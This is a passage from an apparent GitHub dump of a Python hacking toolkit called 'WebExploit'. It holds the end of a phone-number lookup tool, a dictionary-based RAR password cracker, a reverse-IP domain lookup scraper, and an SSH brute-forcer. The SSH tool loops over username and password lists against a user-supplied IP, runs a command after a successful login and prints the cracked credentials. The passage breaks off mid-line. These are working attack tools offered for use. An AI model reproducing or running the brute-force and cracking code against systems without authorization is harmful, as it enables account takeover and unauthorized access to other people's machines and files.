{bold}{green}{bold}{isValid}{nbold}') 126 | t.sleep(0.5) 127 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}PossibleNumber{nbold}{f.WHITE} >>> {bold}{green}{bold}{isPossible}{nbold}') 128 | t.sleep(0.3) 129 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}internationalFormat{nbold}{f.WHITE} >>> {bold}{green}{bold}{formattedNum}{nbold}') 130 | t.sleep(0.5) 131 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}MobileFormat{nbold}{f.WHITE} >>> {bold}{green}{bold}{formattedNumMobile}{nbold}') 132 | t.sleep(0.5) 133 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}originalNumber{nbold}{f.WHITE} >>> {bold}{green}{bold}{numberType}{nbold}') 134 | t.sleep(0.5) 135 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}numberFormat{nbold}{f.WHITE} >>> {bold}{green}{bold}{phoneDetector()}{nbold}') 136 | t.sleep(0.5) 137 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}E.164-Format{nbold}{f.WHITE} >>> {bold}{green}{bold}{phonenumbers.format_number(Number, phonenumbers.PhoneNumberFormat.E164)}{nbold}') 138 | t.sleep(0.5) 139 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}countryCode{nbold}{f.WHITE} >>> {bold}{green}{bold}{Number.country_code}{nbold}') 140 | t.sleep(0.5) 141 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}nationalNumber{nbold}{f.WHITE} >>> {bold}{green}{bold}{Number.national_number}{nbold}') 142 | t.sleep(0.5) 143 | # location on google map incoming .... -------------------------------------------------------------------------------- /cores/rarc.py: -------------------------------------------------------------------------------- 1 | def run(): 2 | ''' 3 | MIT License 4 | 5 | Copyright (c) 2022 MJi | DarkƤwn [github.com/c4ssif3r] 6 | 7 | Permission is hereby granted, free of charge, to any person obtaining a copy 8 | of this software and associated documentation files (the "Software"), to deal 9 | in the Software without restriction, including without limitation the rights 10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 11 | copies of the Software, and to permit persons to whom the Software is 12 | furnished to do so, subject to the following conditions: 13 | 14 | The above copyright notice and this permission notice shall be included in all 15 | copies or substantial portions of the Software. 16 | 17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 23 | SOFTWARE. 24 | ''' 25 | 'pip install google-search' 26 | try: 27 | import time as t 28 | from colorama import Fore as f 29 | import sys, os 30 | import rarfile 31 | from random import choice 32 | except: 33 | print("\033[0;31m please run command \033[0;32m pip install -r requirements.txt !") 34 | t.sleep(1) 35 | sys.exit() 36 | 37 | black = "\033[0;30m" 38 | red = "\033[0;31m" 39 | green = "\033[0;32m" 40 | brown = "\033[0;33m" 41 | blue = "\033[0;34m" 42 | purple = "\033[0;35m" 43 | cyan = "\033[0;36m" 44 | l_gray = "\033[0;37m" 45 | dark_gray = "\033[1;30m" 46 | l_red = "\033[1;31m" 47 | l_green = "\033[1;32m" 48 | yellow = "\033[1;33m" 49 | l_blue = "\033[1;34m" 50 | l_purple = "\033[1;35m" 51 | l_cyan = "\033[1;36m" 52 | l_white = "\033[1;37m" 53 | faint = "\033[2m" 54 | italic = "\033[3m" 55 | underline = "\033[4m" 56 | blink = "\033[5m" 57 | nefative = "\033[7m" 58 | cross = "\033[9m" 59 | ended = "\033[0m" 60 | bold = "\033[1m" 61 | nbold = "\033[0m" 62 | white = f.WHITE 63 | 64 | bnr = [''' 65 | ░▒█▀▀▄░░░█▀▀▄░░░▒█▀▀▄░░░░░░░░▒█▀▀▄ 66 | ░▒█▄▄▀░░▒█▄▄█░░░▒█▄▄▀░░░▄▄░░░▒█░░░ 67 | ░▒█░▒█░░▒█░▒█░░░▒█░▒█░░░▀▀░░░▒█▄▄▀ ''', ''' 68 | __ _ __ _ 69 | )_) )_) )_) / ` 70 | / \ / / / \ o (_ '''] 71 | 72 | def r_bnr(bnr): 73 | return choice(bnr) 74 | 75 | print (f'{blink}{r_bnr(bnr)}{ended}', end='') 76 | t.sleep(2) 77 | print(f' {italic}From{ended} : ', end='') 78 | #create flush text [simple] 79 | print(f'{red}{bold}', end='', flush=True) 80 | print(f'{bold}W', end='', flush=True) 81 | t.sleep(0.5) 82 | print('e', end='', flush=True) 83 | t.sleep(0.7) 84 | print('b', end='', flush=True) 85 | t.sleep(0.4) 86 | print('E', end='', flush=True) 87 | t.sleep(0.1) 88 | print('x', end='', flush=True) 89 | t.sleep(0.2) 90 | print('p', end='', flush=True) 91 | t.sleep(0.3) 92 | print('l', end='', flush=True) 93 | t.sleep(0.4) 94 | print('o', end='', flush=True) 95 | t.sleep(0.5) 96 | print('i', end='', flush=True) 97 | t.sleep(1.5) 98 | print(f't{ended}', flush=True) 99 | nbold = "\033[0m" # tahe koskholi ! 100 | t.sleep(1) 101 | print(f'{white}{nbold}') 102 | 103 | print (f'\n {bold}{f.GREEN}[{f.WHITE}RAR{f.GREEN}]{f.WHITE}{f.RED} R.A.R{f.WHITE}{bold} RAR {bold}C{nbold}racker T00L !\n\n\n') 104 | t.sleep(3) 105 | 106 | 107 | 108 | 109 | while True: 110 | try: 111 | rarc = input(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}R.A.R/{bold}FILE[rar]{nbold}{f.WHITE} enter {bold}\'RarFile{nbold}\' [ex: /Desktop/mji.rar]:#{f.GREEN}{bold} ') 112 | print(f'{nbold}') 113 | 114 | if rarc: 115 | break 116 | else: 117 | input('please enter a RAR file') 118 | continue 119 | 120 | except Exception as err_rarc: 121 | print(f'\n\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] {bold}ERROR -> {err_rarc}{nbold} EXITTING . . .') 122 | t.sleep(2) 123 | # break 124 | sys.exit(0) 125 | while True: 126 | passwords = input(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}R.A.R/{bold}RAR-CRACKER{nbold}{f.WHITE} enter \'Password LIST{nbold}\' [ex: /home/WebExploit/Desktop/passlist_example.txt]:#{f.GREEN}{bold} ') 127 | if passwords: 128 | try: 129 | passes = open(passwords, 'r').read().split() 130 | # passes.close() 131 | break 132 | except Exception as file_err: 133 | print (f'\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}RARC/{f.GREEN}Passwords{white}] {nbold}{f.CYAN} ERROR : \'{bold}{file_err}{nbold}\' \n') 134 | t.sleep(1) 135 | continue 136 | t.sleep(1) 137 | print(f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}Z.I.P/{bold}ZIP-CRACKER{nbold}{f.YELLOW} Loadind modules {bold}rar-cracker . . . !{nbold}]') 138 | t.sleep(3) 139 | 140 | try: 141 | with rarfile.RarFile(rarc) as rf: 142 | for pwd_ in passes: 143 | try: 144 | rf.extractall(pwd=pwd_.encode()) #strip() 145 | print (f'\n {nbold}{f.WHITE}[{f.GREEN}{bold}CRACKER{f.WHITE}{nbold}@{f.RED}RAR.C/{f.GREEN}Password-Found{white}] {nbold}{f.CYAN} \'{bold}{pwd_}{nbold}\' \n') 146 | break 147 | except: 148 | print (f'\n {nbold}{f.WHITE}[{f.RED}{bold}CRACKER{f.WHITE}{nbold}@{f.RED}RAR.C/{f.YELLOW}Password-NotFound{white}] {nbold}{f.RED} \'{bold}{pwd_}{nbold}\' \n') 149 | continue 150 | except: 151 | pass 152 | 153 | 154 | 155 | # with rarfile.RarFile(rarc) as rf: 156 | # for password in passes: 157 | # try: 158 | # rf.extractall(pwd=password.encode()) 159 | # return password 160 | # except: 161 | # pass 162 | -------------------------------------------------------------------------------- /cores/ril.py: -------------------------------------------------------------------------------- 1 | def run(): 2 | ''' 3 | MIT License 4 | 5 | Copyright (c) 2022 MJi | DarkƤwn [github.com/c4ssif3r] 6 | 7 | Permission is hereby granted, free of charge, to any person obtaining a copy 8 | of this software and associated documentation files (the "Software"), to deal 9 | in the Software without restriction, including without limitation the rights 10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 11 | copies of the Software, and to permit persons to whom the Software is 12 | furnished to do so, subject to the following conditions: 13 | 14 | The above copyright notice and this permission notice shall be included in all 15 | copies or substantial portions of the Software. 16 | 17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 23 | SOFTWARE. 24 | ''' 25 | method = "" 26 | #import re 27 | # reverse ip lookup ril 28 | import time as t 29 | from colorama import Fore as f 30 | from random import choice 31 | import sys, os 32 | import requests as r 33 | import json as j 34 | from fake_useragent import UserAgent 35 | agent = UserAgent() 36 | from fake_headers import Headers 37 | 38 | 39 | black = "\033[0;30m" 40 | red = "\033[0;31m" 41 | green = "\033[0;32m" 42 | brown = "\033[0;33m" 43 | blue = "\033[0;34m" 44 | purple = "\033[0;35m" 45 | cyan = "\033[0;36m" 46 | l_gray = "\033[0;37m" 47 | dark_gray = "\033[1;30m" 48 | l_red = "\033[1;31m" 49 | l_green = "\033[1;32m" 50 | yellow = "\033[1;33m" 51 | l_blue = "\033[1;34m" 52 | l_purple = "\033[1;35m" 53 | l_cyan = "\033[1;36m" 54 | l_white = "\033[1;37m" 55 | faint = "\033[2m" 56 | italic = "\033[3m" 57 | underline = "\033[4m" 58 | blink = "\033[5m" 59 | nefative = "\033[7m" 60 | cross = "\033[9m" 61 | ended = "\033[0m" 62 | bold = "\033[1m" 63 | nbold = "\033[0m" 64 | white = f.WHITE 65 | bnr = [''' 66 | 67 | ▀███▀▀▀██▄ ▀████▀ ▀████▀ 68 | ██ ▀██▄ ██ ██ 69 | ██ ▄██ ██ ██ 70 | ▓██████ ██ ██ 71 | ▓█ ██▄ █▓ █▓ ▄ 72 | ▓█ ▀▓█ █▓ █▓ ▒█ 73 | ▓█ ▓ ▓▓ ▓▓ ▓▓ ▓ 74 | ▓▓ ▀▓▓▓ ▒▓ ▓▒ ▓▓ 75 | ▒ ▒▓▒ ▒ ▒ ▒ ▒▓▒ ▒ ▒ ▒▒ ▓▒ ▒ ''', ''' 76 | ██▀███ ██ ██▓ 77 | ▓██ ▒ ██▒ ▒▓██ ▓██▒ 78 | ▓██ ░▄█ ▒ ░▒██ ▒██░ 79 | ▒██▀▀█▄ ░██ ▒██░ 80 | ░██▓ ▒██▒ ░██ ░██████ 81 | ░ ▒▓ ░▒▓░ ░▓ ░ ▒░▓ 82 | ░▒ ░ ▒░ ▒ ░ ░ ▒ 83 | ░ ░ ▒ ░ ░ 84 | ░ ░ ░ '''] 85 | 86 | def r_bnr(bnr): 87 | return choice(bnr) 88 | 89 | print (f'{blink}{r_bnr(bnr)}{ended}', end='') 90 | t.sleep(2) 91 | print(f' {italic}From{ended} : ', end='') 92 | #create flush text [simple] 93 | print(f'{red}{bold}', end='', flush=True) 94 | print(f'{bold}W', end='', flush=True) 95 | t.sleep(0.5) 96 | print('e', end='', flush=True) 97 | t.sleep(0.7) 98 | print('b', end='', flush=True) 99 | t.sleep(0.4) 100 | print('E', end='', flush=True) 101 | t.sleep(0.1) 102 | print('x', end='', flush=True) 103 | t.sleep(0.2) 104 | print('p', end='', flush=True) 105 | t.sleep(0.3) 106 | print('l', end='', flush=True) 107 | t.sleep(0.4) 108 | print('o', end='', flush=True) 109 | t.sleep(0.5) 110 | print('i', end='', flush=True) 111 | t.sleep(1.5) 112 | print(f't{ended}', flush=True) 113 | nbold = "\033[0m" # tahe koskholi ! 114 | t.sleep(1) 115 | 116 | 117 | 118 | print (f'\n {bold}{f.GREEN}[{f.WHITE}RIL{f.GREEN}]{f.WHITE}{f.RED} R.I.L{f.WHITE}{nbold} {bold}R{nbold}everce {bold}I{nbold}p {bold}L{nbold}ookup tool !\n\n\n') 119 | t.sleep(2) 120 | print (f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}R.I.L/{f.CYAN}{bold}REVERCE IP LOOKUP]{white} advanced tool for find sites on a host {red}{bold} RIL {nbold}{white} tool !\n') 121 | 122 | while True: 123 | try: 124 | ur = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}R.I.L/{bold}URL{nbold}{f.WHITE} enter {bold}\'URL or IP{nbold}\' [ex: GOOGLE.com, 1.1.1.1]:#{f.GREEN}{bold} ') 125 | print(f'{nbold}') 126 | 127 | if ur: 128 | break 129 | else: 130 | continue 131 | 132 | except KeyboardInterrupt: 133 | print(f'\n\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .') 134 | t.sleep(2) 135 | # break 136 | sys.exit(0) 137 | 138 | if 'http://' in ur: 139 | try: 140 | url = ur.replace('http://','') 141 | except: 142 | url = ur 143 | if 'https://' in ur: 144 | try: 145 | url = ur.replace('https://','') 146 | except: 147 | url = ur 148 | else: 149 | url = ur 150 | 151 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}RIL/{bold}URL{nbold}{f.WHITE}]{f.WHITE} >>> {bold}{url}{nbold}\n') 152 | 153 | t.sleep(3) 154 | 155 | # data = ('remoteAddress='+url+'&key=') 156 | data = {'remoteAddress': url} 157 | leng = data 158 | 159 | lenght = len(leng) 160 | 161 | hed = {'Host': 'domains.yougetsignal.com', 162 | 'User-Agent': 'Mozilla/5.0 (X11; Linux aarch64; rv:91.0) Gecko/20100101 Firefox/91.0', 163 | 'Accept': 'text/javascript, text/html, application/xml, text/xml, */*', 164 | 'Accept-Language': 'en-US,en;q=0.5', 165 | 'Accept-Encoding': 'gzip, deflate, br', 166 | 'X-Requested-With': 'XMLHttpRequest', 167 | 'X-Prototype-Version': '1.6.0', 168 | 'Content-type': 'application/x-www-form-urlencoded; charset=UTF-8', 169 | 'Origin': 'https://www.yougetsignal.com', 170 | 'Connection': 'keep-alive', 171 | 'Content-Length': str(lenght), 172 | 'Referer': 'https://www.yougetsignal.com/', 173 | 'Sec-Fetch-Dest': 'empty', 174 | 'Sec-Fetch-Mode': 'cors', 175 | 'Sec-Fetch-Site': 'same-site' 176 | } 177 | #print (hed) 178 | headers_random = Headers( 179 | browser='firefox', # Generate Chrome , firefox UA 180 | os='win', # Generate Windows, linux platform 181 | headers=True # generate misc headers 182 | ).generate() 183 | 184 | 185 | try: 186 | #r.get('https://domains.yougetsignal.com', headers=header) 187 | result = r.post('https://domains.yougetsignal.com/domains.php', headers=hed, data=data) 188 | 189 | except Exception as error: 190 | print (f' {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}R.I.L/{f.GREEN}REQUEST {nbold}{f.CYAN} BECAUSE: \'{bold}{error}{nbold}\' TRY WITH VPN{nbold}!\n') 191 | t.sleep(3) 192 | sys.exit() 193 | #print (f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}R.I.L/{f.CYAN}{bold}TRY] trying WITH RANDOM HEADER{green}{bold} REQUEST AGAIN . . .{nbold}{white} !\n') 194 | 195 | #result = r.post('https://domains.yougetsignal.com/domains.php', headers=headers_random, data=data) 196 | #input('enter for show domains') 197 | res = result.text 198 | ril = j.loads(res) 199 | 200 | status = ril['status'] 201 | method = ril["resultsMethod"] 202 | LastScrape = ril["lastScrape"] 203 | domains_count = ril["domainCount"] 204 | remote_address = ril["remoteAddress"] 205 | domains = ril["domainArray"] 206 | try: 207 | mesg = ril["message"] 208 | print (f' {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}R.I.L/{f.YELLOW}ERROR {nbold}{f.CYAN} BECAUSE: \'{bold}{mesg}{nbold}\' TRY WITH VPN {nbold}!\n') 209 | sys.exit() 210 | except: 211 | pass 212 | 213 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}STATUS{nbold}{f.WHITE} >>> {bold}{green}{bold}{status}{nbold}') 214 | t.sleep(0.5) 215 | #print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}METHOD{nbold}{f.WHITE} >>> {bold}{green}{bold}{method}{nbold}') 216 | t.sleep(0.5) 217 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}LAST-SCRAPE{nbold}{f.WHITE} >>> {bold}{green}{bold}{LastScrape}{nbold}') 218 | t.sleep(0.5) 219 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}DOMAINS-COUNT{nbold}{f.WHITE} >>> {bold}{green}{bold}{domains_count}{nbold}') 220 | t.sleep(0.5) 221 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}REMOTE-ADDRESS{nbold}{f.WHITE} >>> {bold}{green}{bold}{remote_address}{nbold}') 222 | t.sleep(0.5) 223 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}ALL DOMAINS{bold}{f.WHITE} ::: {bold}{green}{bold}') 224 | 225 | t.sleep(2) 226 | print(f"{italic}{yellow}-+-" * 10) 227 | for d, u in domains: 228 | print (f' {f.WHITE}{nbold}[{italic}{f.RED}WebExploit{nbold}{f.WHITE}@{red}R.I.L/{blue}domains{white}] {yellow} × {d} ×') 229 | t.sleep(0.09) 230 | print (f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}R.I.L/{f.CYAN}{bold}Domains{white}]{italic} The WebExploit Founded {red}{bold} {domains_count} {nbold}{white} on {bold}{url}\n\n') 231 | 232 | 233 | 234 | 235 | 236 | -------------------------------------------------------------------------------- /cores/ssc.py: -------------------------------------------------------------------------------- 1 | def run(): 2 | ''' 3 | MIT License 4 | 5 | Copyright (c) 2022 MJi | DarkƤwn [github.com/c4ssif3r] 6 | 7 | Permission is hereby granted, free of charge, to any person obtaining a copy 8 | of this software and associated documentation files (the "Software"), to deal 9 | in the Software without restriction, including without limitation the rights 10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 11 | copies of the Software, and to permit persons to whom the Software is 12 | furnished to do so, subject to the following conditions: 13 | 14 | The above copyright notice and this permission notice shall be included in all 15 | copies or substantial portions of the Software. 16 | 17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 23 | SOFTWARE. 24 | ''' 25 | 'pip install google-search' 26 | try: 27 | import time as t 28 | from colorama import Fore as f 29 | import sys, os 30 | import requests as r 31 | import paramiko 32 | from random import choice 33 | except: 34 | print("\033[0;31m please run command \033[0;32m pip install -r requirements.txt !") 35 | t.sleep(1) 36 | sys.exit() 37 | 38 | black = "\033[0;30m" 39 | red = "\033[0;31m" 40 | green = "\033[0;32m" 41 | brown = "\033[0;33m" 42 | blue = "\033[0;34m" 43 | purple = "\033[0;35m" 44 | cyan = "\033[0;36m" 45 | l_gray = "\033[0;37m" 46 | dark_gray = "\033[1;30m" 47 | l_red = "\033[1;31m" 48 | l_green = "\033[1;32m" 49 | yellow = "\033[1;33m" 50 | l_blue = "\033[1;34m" 51 | l_purple = "\033[1;35m" 52 | l_cyan = "\033[1;36m" 53 | l_white = "\033[1;37m" 54 | faint = "\033[2m" 55 | italic = "\033[3m" 56 | underline = "\033[4m" 57 | blink = "\033[5m" 58 | nefative = "\033[7m" 59 | cross = "\033[9m" 60 | ended = "\033[0m" 61 | bold = "\033[1m" 62 | nbold = "\033[0m" 63 | white = f.WHITE 64 | 65 | bnr = [''' 66 | ██████ ██████ ▄████▄ 67 | ▒██ ▒ ▒██ ▒ ▒██▀ ▀█ 68 | ░ ▓██▄ ░ ▓██▄ ▒▓█ ▄ 69 | ▒ ██▒ ▒ ██▒ ▒▓▓▄ ▄██ 70 | ▒██████▒▒ ▒██████▒▒ ▒ ▓███▀ 71 | ▒ ▒▓▒ ▒ ░ ▒ ▒▓▒ ▒ ░ ░ ░▒ ▒ 72 | ░ ░▒ ░ ░ ░▒ ░ ░ ▒ 73 | ░ ░ ░ ░ ░ ░ ░ 74 | ░ ░ ░ ░ ''', ''' 75 | ░▒█▀▀▀█░░░▒█▀▀▀█░░░▒█▀▀▄ 76 | ░░▀▀▀▄▄░░░░▀▀▀▄▄░░░▒█░░░ 77 | ░▒█▄▄▄█░░░▒█▄▄▄█░░░▒█▄▄▀ '''] 78 | 79 | def r_bnr(bnr): 80 | return choice(bnr) 81 | 82 | print (f'{blink}{r_bnr(bnr)}{ended}', end='') 83 | t.sleep(2) 84 | print(f' {italic}From{ended} : ', end='') 85 | #create flush text [simple] 86 | print(f'{red}{bold}', end='', flush=True) 87 | print(f'{bold}W', end='', flush=True) 88 | t.sleep(0.5) 89 | print('e', end='', flush=True) 90 | t.sleep(0.7) 91 | print('b', end='', flush=True) 92 | t.sleep(0.4) 93 | print('E', end='', flush=True) 94 | t.sleep(0.1) 95 | print('x', end='', flush=True) 96 | t.sleep(0.2) 97 | print('p', end='', flush=True) 98 | t.sleep(0.3) 99 | print('l', end='', flush=True) 100 | t.sleep(0.4) 101 | print('o', end='', flush=True) 102 | t.sleep(0.5) 103 | print('i', end='', flush=True) 104 | t.sleep(1.5) 105 | print(f't{ended}', flush=True) 106 | nbold = "\033[0m" # tahe koskholi ! 107 | t.sleep(1) 108 | print(f'{white}{nbold}') 109 | 110 | print (f'\n {bold}{f.GREEN}[{f.WHITE}SSC{f.GREEN}]{f.WHITE}{f.RED} S.S.C{f.WHITE}{bold} SS{nbold}h {bold}C{nbold}racker T00L !\n\n\n') 111 | t.sleep(3) 112 | 113 | 114 | 115 | 116 | while True: 117 | try: 118 | host = input(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}S.S.C/{bold}IP{nbold}{f.WHITE} enter {bold}\'IP{nbold}\' [ex: 1.1.1.1]:#{f.GREEN}{bold} ') 119 | print(f'{nbold}') 120 | 121 | if host: 122 | break 123 | else: 124 | continue 125 | 126 | except KeyboardInterrupt: 127 | print(f'\n\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .') 128 | t.sleep(2) 129 | # break 130 | sys.exit(0) 131 | # know = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}S.S.C/{bold}SSH-CRACKER{nbold}{f.WHITE} Are You Know {bold}USERNAME {nbold}? [y > yes | n > no]:#{f.GREEN}{bold} ') 132 | 133 | print(f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}S.S.C/{bold}SSH-CRACKER{nbold}{f.YELLOW} If You Know {bold}USERNAME {nbold}Give A File With 1 Username !{white}]') 134 | t.sleep(3) 135 | 136 | while True: 137 | usernames = input(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}S.S.C/{bold}SSH-CRACKER{nbold}{f.WHITE} enter \'USERNAME LIST{nbold}\' [ex: ssh-users.txt]:#{f.GREEN}{bold} ') 138 | if usernames: 139 | try: 140 | users = open(usernames, 'r').read().split() 141 | # users.close() 142 | break 143 | except Exception as file_err: 144 | print (f'\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}S.S.C/{f.GREEN}Usernames{white}] {nbold}{f.CYAN} ERROR : \'{bold}{file_err}{nbold}\' \n') 145 | t.sleep(1) 146 | continue 147 | t.sleep(1) 148 | 149 | 150 | while True: 151 | passwords = input(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}S.S.C/{bold}SSH-CRACKER{nbold}{f.WHITE} enter \'Password LIST{nbold}\' [ex: /home/WebExploit/Desktop/ssh-passwords.txt]:#{f.GREEN}{bold} ') 152 | if passwords: 153 | try: 154 | passes = open(passwords, 'r').read().split() 155 | # passes.close() 156 | break 157 | except Exception as file_err: 158 | print (f'\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}S.S.C/{f.GREEN}Passwords{white}] {nbold}{f.CYAN} ERROR : \'{bold}{file_err}{nbold}\' \n') 159 | t.sleep(1) 160 | continue 161 | t.sleep(1) 162 | 163 | print(f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}S.S.C/{bold}SSH-CRACKER{nbold}{f.YELLOW} Loadind modules {bold}ssh-cracker . . . !{nbold}]') 164 | t.sleep(3) 165 | try: 166 | client = paramiko.client.SSHClient() 167 | client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 168 | except Exception as err: 169 | print (f'\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}S.S.C/{f.GREEN}Modules-Loader{white}] {nbold}{f.CYAN} ERROR : \'{bold}{err}{nbold}\' \n') 170 | sys.exit() 171 | 172 | print(f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}S.S.C/{bold}SSH-CRACKER/{nbold}{f.YELLOW}ATTACK{bold} launching ATTACK in{white}]', end='', flush=True) 173 | t.sleep(1) 174 | print (' 5 ', end='', flush=True) 175 | t.sleep(1) 176 | print (' 4 ', end='', flush=True) 177 | t.sleep(1) 178 | print (' 3 ', end='', flush=True) 179 | t.sleep(1) 180 | print (' 2 ', end='', flush=True) 181 | t.sleep(1) 182 | print (' 1 ', end='', flush=True) 183 | t.sleep(1) 184 | print (' 0 ', end='', flush=True) 185 | 186 | 187 | t.sleep(1) 188 | 189 | #print(f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}S.S.C/{bold}SSH-CRACKER/{nbold}{f.YELLOW}USERNAMES-COUNT {white}> > >{bold} {red}{len(str(users))} {white}]\n') 190 | #t.sleep(1) 191 | #print(f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}S.S.C/{bold}SSH-CRACKER/{nbold}{f.YELLOW}PASSWORDS-COUNT {white}> > >{bold} {red}{len(str(passes))} {white}]\n') 192 | #t.sleep(1) 193 | #k = len(int(passes)) 194 | #o = len(int(users)) 195 | #hits = (k+o) 196 | #print(f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}S.S.C/{bold}SSH-CRACKER/{nbold}{f.YELLOW}HIT-COUNT {white}> > >{bold} {red} {hits} . . .{white}]\n') 197 | t.sleep(3) 198 | print(f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}S.S.C/{bold}SSH-CRACKER/{nbold}{f.YELLOW}ATTACK{green}{bold} LAUNCH{white}]\n') 199 | 200 | for username in users: 201 | for password in passes: 202 | try: 203 | client.connect(host, username=username, password=password) 204 | _stdin, _stdout,_stderr = client.exec_command("df") 205 | print(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}S.S.C/{bold}{green}INFO{nbold}{f.WHITE} User: {bold}{green}\'{username}{nbold}{white}\' Passowrd: {bold} \'{green}{password}{nbold}{white}\' {bold}{green} SUCESSFULL !') 206 | t.sleep(1) 207 | print(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}S.S.C/{bold}{green}INFO{nbold}{f.WHITE} Commaned Exec: {bold}{green}\n{_stdout.read().decode()}') 208 | client.close() 209 | break 210 | sys.exit(0) 211 | except Exception as ssh_error: 212 | print(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}S.S.C/{bold}{green}INFO{nbold}{f.WHITE} User: {bold}{red}\'{username}{nbold}{white}\' 